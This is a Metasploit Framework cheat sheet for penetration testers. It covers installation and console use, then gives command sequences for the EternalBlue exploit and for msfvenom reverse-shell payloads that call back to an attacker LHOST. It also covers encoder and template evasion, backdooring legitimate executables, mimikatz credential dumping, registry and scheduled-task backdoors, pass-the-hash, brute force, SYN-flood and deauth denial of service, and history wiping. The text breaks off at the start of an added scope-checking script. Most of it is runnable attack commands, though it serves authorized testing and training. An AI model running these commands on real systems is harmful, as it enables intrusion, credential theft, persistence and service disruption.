# Metasploit Framework Cheat Sheet

## Overview

The Metasploit Framework is the most widely used penetration testing framework in the world, developed by Rapid7. Originally created by H.D. Moore in 2003, Metasploit has evolved into the de facto standard for exploit development, vulnerability validation and penetration testing. The framework provides a complete platform for developing, testing and executing exploit code against remote target machines, making it an indispensable tool for security professionals, penetration testers and red team operators.

Metasploit's modular architecture consists of exploits, payloads, encoders, NOPs and auxiliary modules that can be combined in various ways to build sophisticated attack scenarios. The framework supports multiple interfaces, including the msfconsole command-line interface, a web-based interface and various APIs for integration with other security tools. With over 2000 exploits and 500 payloads, Metasploit provides broad coverage for testing security vulnerabilities across different operating systems, applications and network services.

The framework's strength lies not only in its large exploit database but also in its payload generation capabilities, post-exploitation modules and evasion techniques. Metasploit allows security professionals to simulate real-world attacks, validate security controls and demonstrate the impact of vulnerabilities to stakeholders. Its integration with other security tools and its extensive documentation make it accessible to beginners and advanced practitioners alike in the field of information security.
## Installation

### Kali Linux Installation

Metasploit comes preinstalled on Kali Linux and can be updated with the package manager:

```bash
# Update Metasploit on Kali Linux
sudo apt update
sudo apt install metasploit-framework

# Initialize the database
sudo msfdb init

# Start PostgreSQL service
sudo systemctl start postgresql
sudo systemctl enable postgresql

# Verify installation
msfconsole --version
```
### Ubuntu/Debian Installation

```bash
# Add Rapid7 repository
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
./msfinstall

# Alternative: Manual installation
sudo apt update
sudo apt install curl wget gnupg2 software-properties-common apt-transport-https ca-certificates

# Add Rapid7 GPG key
curl -fsSL https://apt.metasploit.com/metasploit-framework.gpg.key | sudo apt-key add -

# Add repository
echo "deb https://apt.metasploit.com/ lucid main" | sudo tee /etc/apt/sources.list.d/metasploit-framework.list

# Install Metasploit
sudo apt update
sudo apt install metasploit-framework

# Initialize database
sudo msfdb init
```
### CentOS/RHEL Installation

```bash
# Install dependencies
sudo yum install curl wget which

# Download and run installer
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
sudo ./msfinstall

# Initialize database
sudo msfdb init

# Start PostgreSQL
sudo systemctl start postgresql
sudo systemctl enable postgresql
```
### Docker Installation

```bash
# Pull official Metasploit image
docker pull metasploitframework/metasploit-framework

# Run Metasploit in Docker
docker run --rm -it -v "${HOME}/.msf4:/home/msf/.msf4" metasploitframework/metasploit-framework

# Run with database persistence
docker run --rm -it -v "${HOME}/.msf4:/home/msf/.msf4" -v "${HOME}/msf-db:/opt/metasploit-framework/embedded/var/lib/postgresql" metasploitframework/metasploit-framework

# Create alias for easy access
echo 'alias msfconsole="docker run --rm -it -v \"${HOME}/.msf4:/home/msf/.msf4\" metasploitframework/metasploit-framework"' >> ~/.bashrc
source ~/.bashrc
```
### Windows Installation

```powershell
# Download installer from official website
# https://windows.metasploit.com/metasploitframework-latest.msi

# Install using PowerShell (requires admin privileges)
Start-Process msiexec.exe -Wait -ArgumentList '/I metasploitframework-latest.msi /quiet'

# Verify installation
& "C:\metasploit-framework\bin\msfconsole.bat" --version

# Initialize database (requires PostgreSQL)
& "C:\metasploit-framework\bin\msfdb.bat" init
```
### macOS Installation

```bash
# Install using Homebrew
brew install metasploit

# Alternative: Download installer
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
./msfinstall

# Initialize database
msfdb init

# Start PostgreSQL
brew services start postgresql
```
## Basic Usage

### Starting the Metasploit Console

```bash
# Start msfconsole
msfconsole

# Start with specific database
msfconsole -d msf_database

# Start with custom resource script
msfconsole -r /path/to/script.rc

# Start in quiet mode
msfconsole -q

# Start with specific workspace
msfconsole -w workspace_name
```
### Database Management

```bash
# Initialize database
msfdb init

# Check database status
msfdb status

# Start database
msfdb start

# Stop database
msfdb stop

# Restart database
msfdb restart

# Delete database
msfdb delete

# Reinitialize database
msfdb reinit
```
### Basic Console Commands

```
# Get help
help
?

# Show version information
version

# Exit console
exit
quit

# Clear screen
clear

# Show banner
banner

# Load resource script
resource /path/to/script.rc

# Save command history
history -S /path/to/history.txt

# Load command history
history -L /path/to/history.txt
```
## Core Commands

### Search and Information

```
# Search for exploits
search type:exploit platform:windows
search cve:2017-0144
search name:eternal
search rank:excellent

# Search for payloads
search type:payload platform:windows arch:x64
search type:payload platform:linux format:elf

# Search for auxiliary modules
search type:auxiliary name:scanner

# Search for post-exploitation modules
search type:post platform:windows

# Show module information
info exploit/windows/smb/ms17_010_eternalblue
info payload/windows/x64/meterpreter/reverse_tcp

# Show module options
show options
show advanced
show evasion
show targets
show payloads

# Show available exploits
show exploits

# Show available payloads
show payloads

# Show auxiliary modules
show auxiliary

# Show post-exploitation modules
show post

# Show encoders
show encoders

# Show nops
show nops
```
### Module Selection and Configuration

```
# Use a module
use exploit/windows/smb/ms17_010_eternalblue
use auxiliary/scanner/portscan/tcp
use payload/windows/x64/meterpreter/reverse_tcp

# Set module options
set RHOSTS 192.168.1.100
set RHOST 10.0.0.1
set LHOST 192.168.1.50
set LPORT 4444
set PAYLOAD windows/x64/meterpreter/reverse_tcp

# Set global options
setg RHOSTS 192.168.1.0/24
setg LHOST 192.168.1.50

# Unset options
unset RHOSTS
unset PAYLOAD

# Unset global options
unsetg RHOSTS

# Show current settings
show options
show advanced

# Get option information
info -d RHOSTS

# Set advanced options
set PrependMigrate true
set PrependMigrateProc explorer.exe
set AutoRunScript post/windows/manage/migrate
```
### Target and Payload Management

```
# Show available targets
show targets

# Set specific target
set TARGET 0
set TARGET "Windows 7 SP1 x64"

# Show compatible payloads
show payloads

# Set payload
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set PAYLOAD linux/x86/shell/reverse_tcp
set PAYLOAD java/jsp_shell_reverse_tcp

# Generate payload
generate -f exe -o payload.exe
generate -f elf -o payload.elf
generate -f war -o payload.war

# Show payload options
show options

# Set payload options
set LHOST 192.168.1.50
set LPORT 4444
set EXITFUNC thread
```
## Exploitation Workflow

### Basic Exploitation Process

```
# 1. Search for exploit
search ms17-010

# 2. Use exploit module
use exploit/windows/smb/ms17_010_eternalblue

# 3. Show and set options
show options
set RHOSTS 192.168.1.100
set LHOST 192.168.1.50

# 4. Set payload
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LPORT 4444

# 5. Check if target is vulnerable
check

# 6. Run the exploit
exploit
run

# 7. Interact with session
sessions -l
sessions -i 1
```
### Advanced Exploitation Techniques

```
# Use specific target
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.50
set LPORT 4444
exploit -j

# Exploit with specific options
exploit -z    # Don't interact with session
exploit -j    # Run as job
exploit -J    # Force running in foreground

# Set advanced evasion options
set PrependMigrate true
set PrependMigrateProc explorer.exe
set AutoRunScript post/windows/manage/migrate

# Use encoders for evasion
set ENCODER x86/shikata_ga_nai
set ITERATIONS 3

# Set custom user agent
set HttpUserAgent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"

# Use custom templates
set TEMPLATE /path/to/template.exe
```
### Multi-Target Exploitation

```
# Set multiple targets
set RHOSTS 192.168.1.100-110
set RHOSTS file:/path/to/targets.txt
set RHOSTS 192.168.1.0/24

# Use threading for faster exploitation
set THREADS 10

# Run exploit against all targets
exploit

# Check all targets
check

# Use auxiliary scanner first
use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.1.0/24
set THREADS 20
run
```
## Payload Generation

### msfvenom Payload Generation

```bash
# Generate Windows executables
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o payload.exe

# Generate Linux executables
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f elf -o payload.elf

# Generate macOS executables
msfvenom -p osx/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f macho -o payload.macho

# Generate Android APK
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -o payload.apk

# Generate iOS payload
msfvenom -p apple_ios/aarch64/meterpreter_reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f macho -o payload.macho

# Generate web payloads
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f war -o payload.war
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f raw -o payload.php
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f asp -o payload.asp
```
### Encoded Payloads

```bash
# Encode with shikata_ga_nai
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x86/shikata_ga_nai -i 3 -f exe -o encoded_payload.exe

# Multiple encoding iterations
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f exe -o heavily_encoded.exe

# Use different encoders
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x86/alpha_mixed -f exe -o alpha_encoded.exe

# Chain multiple encoders
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x86/shikata_ga_nai -e x86/alpha_mixed -i 5 -f exe -o multi_encoded.exe
```
### Custom Templates and Formats

```bash
# Use custom template
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -x /path/to/template.exe -f exe -o backdoored.exe

# Keep template behavior
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -x /path/to/template.exe -k -f exe -o backdoored.exe

# Generate shellcode
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f c
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f python
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f powershell

# Generate different formats
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f dll -o payload.dll
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f msi -o payload.msi
```
### Platform-Specific Payloads

```bash
# Windows payloads
msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o shell.exe
msfvenom -p windows/x64/vncinject/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o vnc.exe
msfvenom -p windows/x64/powershell_reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o ps.exe

# Linux payloads
msfvenom -p linux/x64/shell/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f elf -o shell.elf
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=4444 -f elf -o bind.elf

# Multi-platform payloads
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f jar -o payload.jar
msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f py -o payload.py
```
## Session Management

### Basic Session Commands

```
# List active sessions
sessions

# List sessions with details
sessions -l

# Interact with session
sessions -i 1

# Kill session
sessions -k 1

# Kill all sessions
sessions -K

# Upgrade shell to meterpreter
sessions -u 1

# Run command on session
sessions -c "whoami" -i 1

# Run script on session
sessions -s /path/to/script.rb -i 1
```
### Session Interaction

```
# Background current session
background
bg

# Return to session
sessions -i 1

# Run local command
!ls
!pwd
!cat /etc/passwd

# Upload file to session
upload /local/file.txt C:\\Windows\\Temp\\file.txt

# Download file from session
download C:\\Windows\\System32\\drivers\\etc\\hosts /tmp/hosts

# Execute command
execute -f cmd.exe -a "/c whoami"
execute -f powershell.exe -a "-Command Get-Process"

# Get system information
sysinfo
getuid
getpid
```
### Advanced Session Management

```
# Route traffic through session
route add 10.0.0.0/24 1
route print
route delete 10.0.0.0/24

# Port forwarding
portfwd add -l 8080 -p 80 -r 192.168.1.100
portfwd list
portfwd delete -l 8080

# Pivot through session
use auxiliary/server/socks_proxy
set SRVPORT 1080
run -j

# Auto-route through session
use post/multi/manage/autoroute
set SESSION 1
run
```
## Meterpreter Commands

### System Information

```
# Get system information
sysinfo
getuid
getpid
ps

# Get environment variables
getenv
getenv PATH
getenv COMPUTERNAME

# Get network configuration
ipconfig
ifconfig
route

# Get system privileges
getprivs

# Attempt to elevate to SYSTEM
getsystem

# Get current directory
pwd
getwd

# List drives
show_mount
```
### File System Operations

```
# Navigate file system
cd C:\\Windows
cd /etc
ls
dir

# Search for files
search -f *.txt
search -f config.* -d C:\\
search -f passwd -d /etc

# Download files
download C:\\Windows\\System32\\config\\SAM /tmp/SAM
download /etc/passwd /tmp/passwd

# Upload files
upload /tmp/payload.exe C:\\Windows\\Temp\\payload.exe
upload /tmp/script.sh /tmp/script.sh

# Edit files
edit C:\\Windows\\Temp\\file.txt
edit /tmp/file.txt

# Delete files
rm C:\\Windows\\Temp\\file.txt
del /tmp/file.txt

# Create directories
mkdir C:\\Windows\\Temp\\test
mkdir /tmp/test
```
### Process Management

```
# List processes
ps

# Get detailed process information
ps -A
ps -S

# Kill process
kill 1234

# Migrate to process
migrate 1234
migrate explorer.exe

# Execute programs
execute -f cmd.exe
execute -f powershell.exe -a "-Command Get-Process"
execute -f /bin/bash -a "-c 'id'"

# Run as different user
execute -f cmd.exe -u username -p password

# Create process
execute -f notepad.exe -H
```
### Network Operations

```
# Show network connections
netstat
netstat -an

# ARP table
arp

# Network interfaces
ipconfig
ifconfig

# Port forwarding
portfwd add -l 3389 -p 3389 -r 192.168.1.100
portfwd list
portfwd delete -l 3389

# Reverse port forwarding
portfwd add -R -l 8080 -p 80 -r 127.0.0.1

# SOCKS proxy
use auxiliary/server/socks_proxy
set SRVPORT 1080
run -j
```
### Registry Operations (Windows)

```
# Enumerate registry keys
reg enumkey -k HKLM\\Software
reg enumkey -k HKCU\\Software

# Query registry values
reg queryval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion -v ProductName
reg queryval -k HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run

# Set registry values
reg setval -k HKLM\\Software\\Test -v TestValue -t REG_SZ -d "Test Data"

# Delete registry values
reg deleteval -k HKLM\\Software\\Test -v TestValue

# Delete registry keys
reg deletekey -k HKLM\\Software\\Test
```
### Credential Operations

```
# Dump hashes
hashdump

# Load mimikatz
load mimikatz
wdigest
msv
ssp
tspkg
kerberos

# Load kiwi (newer mimikatz)
load kiwi
creds_all
creds_wdigest
creds_msv
creds_ssp
creds_tspkg
creds_kerberos

# Golden ticket
golden_ticket_create -u Administrator -d domain.com -s S-1-5-21-... -k aes256_key

# Silver ticket
kerberos_ticket_use /path/to/ticket.kirbi
```
### Persistence

```
# Create persistent backdoor
use exploit/windows/local/persistence
set SESSION 1
set STARTUP SYSTEM
run

# Registry persistence
reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v Backdoor -t REG_SZ -d "C:\\Windows\\Temp\\backdoor.exe"

# Service persistence
use post/windows/manage/persistence_exe
set SESSION 1
set REXEPATH C:\\Windows\\Temp\\backdoor.exe
run

# Scheduled task persistence
execute -f schtasks.exe -a "/create /tn Backdoor /tr C:\\Windows\\Temp\\backdoor.exe /sc onlogon"
```
## Post-Exploitation Modules

### Information Gathering

```
# System enumeration
use post/windows/gather/enum_system
use post/linux/gather/enum_system
set SESSION 1
run

# Network enumeration
use post/windows/gather/enum_domain
use post/windows/gather/enum_shares
use post/linux/gather/enum_network
set SESSION 1
run

# Credential gathering
use post/windows/gather/credentials/credential_collector
use post/windows/gather/smart_hashdump
use post/linux/gather/hashdump
set SESSION 1
run

# Application enumeration
use post/windows/gather/enum_applications
use post/windows/gather/enum_chrome
use post/windows/gather/enum_firefox
set SESSION 1
run

# File enumeration
use post/windows/gather/enum_files
use post/multi/gather/find_files
set SESSION 1
set SEARCH_FROM C:\\
set FILE_GLOBS *.txt,*.doc,*.pdf
run
```
### Privilege Escalation

```
# Windows privilege escalation
use post/windows/escalate/getsystem
use post/windows/escalate/bypassuac
use post/windows/escalate/bypassuac_injection
set SESSION 1
run

# Linux privilege escalation
use post/linux/escalate/cve_2021_4034
use post/linux/escalate/sudo_baron_samedit
set SESSION 1
run

# Suggest privilege escalation
use post/multi/recon/local_exploit_suggester
set SESSION 1
run

# UAC bypass
use exploit/windows/local/bypassuac_comhijack
use exploit/windows/local/bypassuac_fodhelper
set SESSION 1
run
```
### Lateral Movement

```
# Pass the hash
use exploit/windows/smb/psexec
set RHOSTS 192.168.1.100
set SMBUser Administrator
set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
run

# WMI execution
use exploit/windows/local/wmi
set SESSION 1
set RHOSTS 192.168.1.100
run

# PowerShell remoting
use exploit/windows/local/powershell_remoting
set SESSION 1
set RHOSTS 192.168.1.100
run

# SSH lateral movement
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.1.0/24
set USERNAME root
set PASSWORD password
run
```
### Data Exfiltration

```
# File collection
use post/multi/gather/find_files
set SESSION 1
set SEARCH_FROM C:\\Users
set FILE_GLOBS *.doc,*.pdf,*.txt,*.xls
run

# Browser data
use post/windows/gather/enum_chrome
use post/windows/gather/enum_firefox
use post/windows/gather/enum_ie
set SESSION 1
run

# Email data
use post/windows/gather/outlook
use post/windows/gather/thunderbird_creds
set SESSION 1
run

# Database enumeration
use auxiliary/admin/mssql/mssql_enum
use auxiliary/admin/mysql/mysql_enum
set SESSION 1
run
```
### Persistence and Backdoors

```
# Registry persistence
use post/windows/manage/persistence_exe
set SESSION 1
set REXEPATH C:\\Windows\\Temp\\backdoor.exe
set STARTUP SYSTEM
run

# Service persistence
use post/windows/manage/persistence
set SESSION 1
set REXEPATH C:\\Windows\\Temp\\backdoor.exe
run

# Scheduled task
use post/windows/manage/schtask
set SESSION 1
set TASKNAME Backdoor
set REXEPATH C:\\Windows\\Temp\\backdoor.exe
run

# WMI persistence
use post/windows/manage/wmi_persistence
set SESSION 1
set REXEPATH C:\\Windows\\Temp\\backdoor.exe
run
```
## Auxiliary Modules

### Scanners

```
# Port scanning
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.0/24
set PORTS 21,22,23,25,53,80,110,443,993,995
set THREADS 20
run

# Service version detection
use auxiliary/scanner/http/http_version
use auxiliary/scanner/ssh/ssh_version
use auxiliary/scanner/ftp/ftp_version
set RHOSTS 192.168.1.0/24
set THREADS 10
run

# SMB enumeration
use auxiliary/scanner/smb/smb_version
use auxiliary/scanner/smb/smb_enumshares
use auxiliary/scanner/smb/smb_enumusers
set RHOSTS 192.168.1.0/24
run

# Web application scanning
use auxiliary/scanner/http/dir_scanner
use auxiliary/scanner/http/files_dir
use auxiliary/scanner/http/http_put
set RHOSTS 192.168.1.100
set THREADS 10
run
```
### Brute Force Attacks

```
# SSH brute force
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.1.100
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/common_passwords.txt
set THREADS 10
run

# FTP brute force
use auxiliary/scanner/ftp/ftp_login
set RHOSTS 192.168.1.100
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/common_passwords.txt
run

# HTTP basic auth brute force
use auxiliary/scanner/http/http_login
set RHOSTS 192.168.1.100
set AUTH_URI /admin
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/common_passwords.txt
run

# SMB brute force
use auxiliary/scanner/smb/smb_login
set RHOSTS 192.168.1.100
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/common_passwords.txt
run
```
### Denial of Service

```
# TCP SYN flood
use auxiliary/dos/tcp/synflood
set RHOST 192.168.1.100
set RPORT 80
set THREADS 10
run

# HTTP slowloris
use auxiliary/dos/http/slowloris
set RHOST 192.168.1.100
set RPORT 80
run

# SMB DoS
use auxiliary/dos/windows/smb/ms09_001_write
set RHOST 192.168.1.100
run

# WiFi deauth
use auxiliary/dos/wifi/deauth
set INTERFACE wlan0
set BSSID 00:11:22:33:44:55
run
```
### SNMP Enumeration

```
# SNMP community scanner
use auxiliary/scanner/snmp/snmp_login
set RHOSTS 192.168.1.0/24
run

# SNMP enumeration
use auxiliary/scanner/snmp/snmp_enum
set RHOSTS 192.168.1.100
set COMMUNITY public
run

# SNMP user enumeration
use auxiliary/scanner/snmp/snmp_enumusers
set RHOSTS 192.168.1.100
run

# SNMP process enumeration
use auxiliary/scanner/snmp/snmp_enumprocesses
set RHOSTS 192.168.1.100
run
```
## Database Integration

### Workspace Management

```
# List workspaces
workspace

# Create workspace
workspace -a project_name

# Switch workspace
workspace project_name

# Delete workspace
workspace -d project_name

# Rename workspace
workspace -r old_name new_name

# Show current workspace
workspace -v
```
### Host and Service Management

```
# Add hosts
db_import /path/to/nmap_scan.xml
hosts

# Add host manually
hosts -a 192.168.1.100 -n target1 -o "Windows 10"

# Show hosts
hosts
hosts -c address,name,os_name

# Search hosts
hosts 192.168.1.0/24
hosts -S windows

# Delete hosts
hosts -d 192.168.1.100

# Add services
services -a -p 80 -s http -h 192.168.1.100

# Show services
services
services -p 80
services -s http

# Delete services
services -d -p 80 -h 192.168.1.100
```
### Vulnerability Management

```
# Show vulnerabilities
vulns

# Add vulnerability
vulns -a -h 192.168.1.100 -n "MS17-010" -r "CVE-2017-0144"

# Search vulnerabilities
vulns -S ms17-010

# Show vulnerability details
vulns -v

# Export vulnerabilities
vulns -O /tmp/vulns.xml
```
### Credential Management

```
# Show credentials
creds

# Add credentials
creds -a -h 192.168.1.100 -u administrator -p password123 -t password

# Search credentials
creds -S administrator

# Show credential details
creds -v

# Export credentials
creds -O /tmp/creds.csv
```
### Loot Management

```
# Show loot
loot

# Add loot
loot -a -h 192.168.1.100 -t "password_file" -f /tmp/passwords.txt

# Search loot
loot -S password

# Export loot
loot -O /tmp/loot.xml
```
## Advanced Techniques

### Custom Module Development

```ruby
# Basic exploit module template
require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Custom Exploit',
      'Description'    => 'Custom exploit description',
      'Author'         => ['Your Name'],
      'License'        => MSF_LICENSE,
      'References'     => [['CVE', '2021-1234']],
      'Platform'       => 'win',
      'Targets'        => [['Windows Universal', {}]],
      'Payload'        => {
        'Space'    => 400,
        'BadChars' => "\x00\x0a\x0d"
      },
      'DisclosureDate' => '2021-01-01',
      'DefaultTarget'  => 0))

    register_options([
      Opt::RPORT(9999)
    ])
  end

  def check
    # Vulnerability check logic
    return Exploit::CheckCode::Vulnerable
  end

  def exploit
    # Exploitation logic
    connect
    print_status("Sending payload...")
    sock.put(payload.encoded)
    handler
    disconnect
  end
end
```
### Custom Payload Development

```ruby
# Basic payload module template
require 'msf/core'

module MetasploitModule
  CachedSize = 200

  include Msf::Payload::Single
  include Msf::Payload::Windows
  include Msf::Payload::Windows::Exec

  def initialize(info = {})
    super(merge_info(info,
      'Name'        => 'Custom Windows Payload',
      'Description' => 'Custom payload description',
      'Author'      => ['Your Name'],
      'License'     => MSF_LICENSE,
      'Platform'    => 'win',
      'Arch'        => ARCH_X86))

    register_options([
      OptString.new('CMD', [true, "Command to execute", 'calc.exe'])
    ])
  end

  def generate
    # Payload generation logic
    cmd = datastore['CMD'] || 'calc.exe'
    # Return shellcode
  end
end
```
### Evasion Techniques

```
# Use encoders
set ENCODER x86/shikata_ga_nai
set ITERATIONS 5

# Use custom templates
set TEMPLATE /path/to/legitimate.exe

# Modify payload behavior
set PrependMigrate true
set PrependMigrateProc explorer.exe

# Use HTTPS for C2
set LHOST 192.168.1.50
set LPORT 443
set HttpsUserAgent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"

# Domain fronting
set HttpHostHeader legitimate-domain.com
set LHOST cdn-provider.com

# Custom user agents
set HttpUserAgent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"

# Sleep and jitter
set WfsDelay 30
set Jitter 25
```
### Automation and Scripting

```bash
# Resource scripts
echo "use exploit/multi/handler" > handler.rc
echo "set PAYLOAD windows/x64/meterpreter/reverse_tcp" >> handler.rc
echo "set LHOST 192.168.1.50" >> handler.rc
echo "set LPORT 4444" >> handler.rc
echo "exploit -j" >> handler.rc

# Load resource script
msfconsole -r handler.rc
```

```ruby
# Ruby scripting (from the msfconsole prompt, enter irb first)
irb
framework = Msf::Simple::Framework.create
session = framework.sessions[1]
session.shell_command("whoami")
```

```ruby
#!/usr/bin/env ruby
# Automation script
require 'msf/core'
require 'msf/base'

framework = Msf::Simple::Framework.create
exploit = framework.exploits.create('windows/smb/ms17_010_eternalblue')
exploit.datastore['RHOSTS'] = '192.168.1.100'
exploit.datastore['PAYLOAD'] = 'windows/x64/meterpreter/reverse_tcp'
exploit.datastore['LHOST'] = '192.168.1.50'
exploit.datastore['LPORT'] = '4444'
exploit.exploit_simple('Payload' => exploit.datastore['PAYLOAD'])
```
## Integration with Other Tools

### Nmap Integration

```
# Import Nmap results
db_import /path/to/nmap_scan.xml

# Use Nmap from within Metasploit
db_nmap -sS -O 192.168.1.0/24
db_nmap -sV -p 1-1000 192.168.1.100

# Automated exploitation based on Nmap results
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.0/24
run

# Use discovered services
hosts -c address,name,os_name
services -c port,proto,name,state
```
### Burp Suite Integration

```
# Configure Burp proxy
set Proxies http:127.0.0.1:8080

# Use Burp findings
use auxiliary/scanner/http/dir_scanner
set RHOSTS target.com
set DICTIONARY /path/to/burp_discovered_dirs.txt
run

# Export session for Burp
sessions -l
sessions -C "netstat -an" -i 1 > network_connections.txt
```
### Cobalt Strike Integration

```bash
# Generate Cobalt Strike compatible payload
msfvenom -p windows/x64/meterpreter/reverse_http LHOST=192.168.1.50 LPORT=80 -f raw | base64
```

```
# Use Cobalt Strike beacon
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_http
set LHOST 192.168.1.50
set LPORT 80
exploit -j

# Lateral movement coordination
route add 10.0.0.0/24 1
use auxiliary/server/socks_proxy
set SRVPORT 1080
run -j
```
### OSINT Integration

```
# Use theHarvester results
use auxiliary/gather/search_email_collector
set DOMAIN target.com
run

# Shodan integration
use auxiliary/gather/shodan_search
set SHODAN_APIKEY your_api_key
set QUERY "apache city:\"New York\""
run

# Social engineering
use auxiliary/gather/social_engineering_toolkit
set TARGET_EMAIL admin@target.com
run
```
## Troubleshooting

### Common Issues and Solutions

```bash
# Database connection issues
msfdb status
msfdb reinit
sudo systemctl restart postgresql

# Module loading errors (from the msfconsole prompt)
reload_all
updatedb

# Payload generation failures
msfvenom --list formats
msfvenom --list encoders
msfvenom --list platforms

# Session connectivity issues (from the msfconsole prompt)
sessions -l
sessions -k 1
route print
route flush

# Permission issues
sudo chown -R $USER:$USER ~/.msf4
sudo chmod -R 755 ~/.msf4
```
### Performance Optimization

```bash
# Increase database performance
echo "shared_buffers = 256MB" | sudo tee -a /etc/postgresql/*/main/postgresql.conf
echo "effective_cache_size = 1GB" | sudo tee -a /etc/postgresql/*/main/postgresql.conf
sudo systemctl restart postgresql

# Optimize threading (from the msfconsole prompt)
set THREADS 20
set MaxSessions 10

# Memory optimization
ulimit -n 4096
echo "* soft nofile 4096" | sudo tee -a /etc/security/limits.conf
echo "* hard nofile 4096" | sudo tee -a /etc/security/limits.conf

# Clean up old sessions (from the msfconsole prompt)
sessions -K
db_rebuild_cache
```
### Debugging

```
# Enable verbose output
set VERBOSE true

# Debug mode (start msfconsole with logging)
msfconsole -L -o /tmp/msf.log

# Ruby debugging
irb
load '/usr/share/metasploit-framework/lib/msf/core.rb'
framework = Msf::Simple::Framework.create

# Module debugging
use exploit/windows/smb/ms17_010_eternalblue
set VERBOSE true
check
```
## Security Considerations

### Operational Security

```
# Use VPN or proxy
set Proxies socks5:127.0.0.1:9050

# Randomize source ports
set CPORT 1024-65535

# Use legitimate user agents
set HttpUserAgent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"

# Implement delays
set WfsDelay 10
set Jitter 25

# Clean up artifacts
rm /tmp/payload.exe
history -c
```
### Legal and Ethical Considerations

```bash
# Document authorization
echo "Authorized penetration test - $(date)" > /tmp/authorization.txt
echo "Scope: 192.168.1.0/24" >> /tmp/authorization.txt
echo "Contact: security@company.com" >> /tmp/authorization.txt
```

```
# Limit scope
set RHOSTS 192.168.1.100-110    # Only authorized targets
set ExitOnSession true          # Limit session creation

# Avoid destructive actions
set DisablePayloadHandler true
set PrependMigrate false
```
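As an added example (not code from the Metasploit project), the following Ruby script checks a resource script before it is loaded: it expands the RHOSTS formats shown in the multi-target section (single host, CIDR block, last-octet range, file:/path) and reports any value that falls outside the authorized scope recorded in the authorization note. The sample resource script, the scope and the contents of the target file are constructed for this example.

```ruby
# Added example (not part of Metasploit): a scope checker for resource scripts.
# It reads every "set RHOSTS ...", "setg RHOSTS ..." and "set RHOST ..." line,
# expands the RHOSTS syntaxes this cheat sheet uses (single IP, CIDR block,
# last-octet range such as 192.168.1.100-110, file:/path/to/targets.txt) and
# reports every value that is not fully inside the authorized networks.
require 'ipaddr'

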